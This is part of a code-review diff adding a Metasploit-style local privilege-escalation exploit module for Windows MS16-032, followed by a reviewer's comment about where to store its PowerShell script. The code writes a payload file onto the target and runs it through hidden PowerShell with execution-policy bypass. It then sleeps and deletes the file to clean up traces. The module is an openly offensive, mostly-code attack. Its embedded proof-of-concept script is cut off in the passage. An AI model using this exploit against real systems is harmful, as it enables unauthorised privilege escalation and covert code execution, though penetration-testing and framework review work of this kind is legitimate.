modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb

```diff
@@ -0,0 +1,519 @@
+        OptBool.new(  'DELETE',  [false, 'Delete temporary powershell file', true]),
+        OptBool.new(  'DRY_RUN',  [false, 'Only show what would be done', false ]),
+        OptInt.new('TIMEOUT',   [false, 'Execution timeout', 60]) #How long until we DELETE file, we have a race condition here, so anything less than 60 seconds might break
+      ], self.class)
+  end
+
+
+  def check
+    os = sysinfo["OS"]
+
+    if os !~ /windows/i
+      # Non-Windows systems are definitely not affected.
+      return Exploit::CheckCode::Safe
+    end
+
+    if sysinfo["Architecture"] =~ /(wow|x)64/i
+      arch = ARCH_X86_64
+    elsif sysinfo["Architecture"] =~ /x86/i
+      arch = ARCH_X86
+    end
+      return arch
+  end
+
+  def exploit
+
+  arch1 = check
+
+  # Exploit PoC from 'b33f'
+  ms16_032 = ms16_032ps
+
+  # Using venom_generator to produce compressed powershell script.  See class at bottom of module.
+  payl = setup_pay
+
+  upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
+  path = pwd || datastore['W_PATH']
+  upfile = "#{path}\\#{upfile}"
+  fd =session.fs.file.new(upfile,"wb")
+  print_status("Writing payload file, #{upfile}...")
+  fd.write(payl)
+  fd.close
+  psh_cmd="IEX `$(gc #{upfile})"
+
+  cmdstr="C:\\Windows\\System32\\windowspowershell\\v1.0\\powershell.exe"
+  if (datastore['TARGET'] == 0 && arch1 == ARCH_X86_64)
+    cmdstr.gsub!("System32","SYSWOW64")
+    print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
+    vprint_warning("#{cmdstr}")
+  end
+
+  #lpAppName
+  ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
+  #lpcommandLine - capped at 1024b
+  ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"")
+
+  print_status('Compressing script contents...')
+  ms16_032_c = compress_script(ms16_032)
+  if (ms16_032_c.size > 8100)
+    print_error("Compressed size: #{ms16_032_c.size}")
+    error_msg =  "Compressed size may cause command to exceed "
+    error_msg += "cmd.exe's 8kB character limit."
+    print_error(error_msg)
+  else
+    print_good("Compressed size: #{ms16_032_c.size}")
+  end
+
+  if datastore['DRY_RUN']
+    print_good("cmd.exe /C powershell -exec Bypass #{ms16_032_c}")
+    return
+  end
+
+  print_status("Executing exploit script...")
+  cmd="cmd.exe /C powershell -nonI -window Hidden -exec Bypass #{ms16_032_c}"
+  args=nil
+  begin
+    process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => false})
+  rescue
+    print_error("An error occurred executing the script.")
+  end
+
+  if (datastore['DELETE'])
+    sleep_t = datastore['TIMEOUT']
+    vprint_warning("Sleeping #{sleep_t} seconds before deleting #{upfile}...")
+    sleep sleep_t
+    begin
+      rm_f(upfile)
+      print_good("Cleaned up #{upfile}")
+    rescue
+      print_error("There was an issue with cleanup of the powershell payload script.")
+    end
+  end
+  print_status("Exploit complete")
+  end
+
+  def ms16_032ps
```

Comment:
It might be cleaner to put this into ``./data/exploits/CVE-XXXX-XXXX/CVE-XXXX-XXXX.ps`` versus inlined.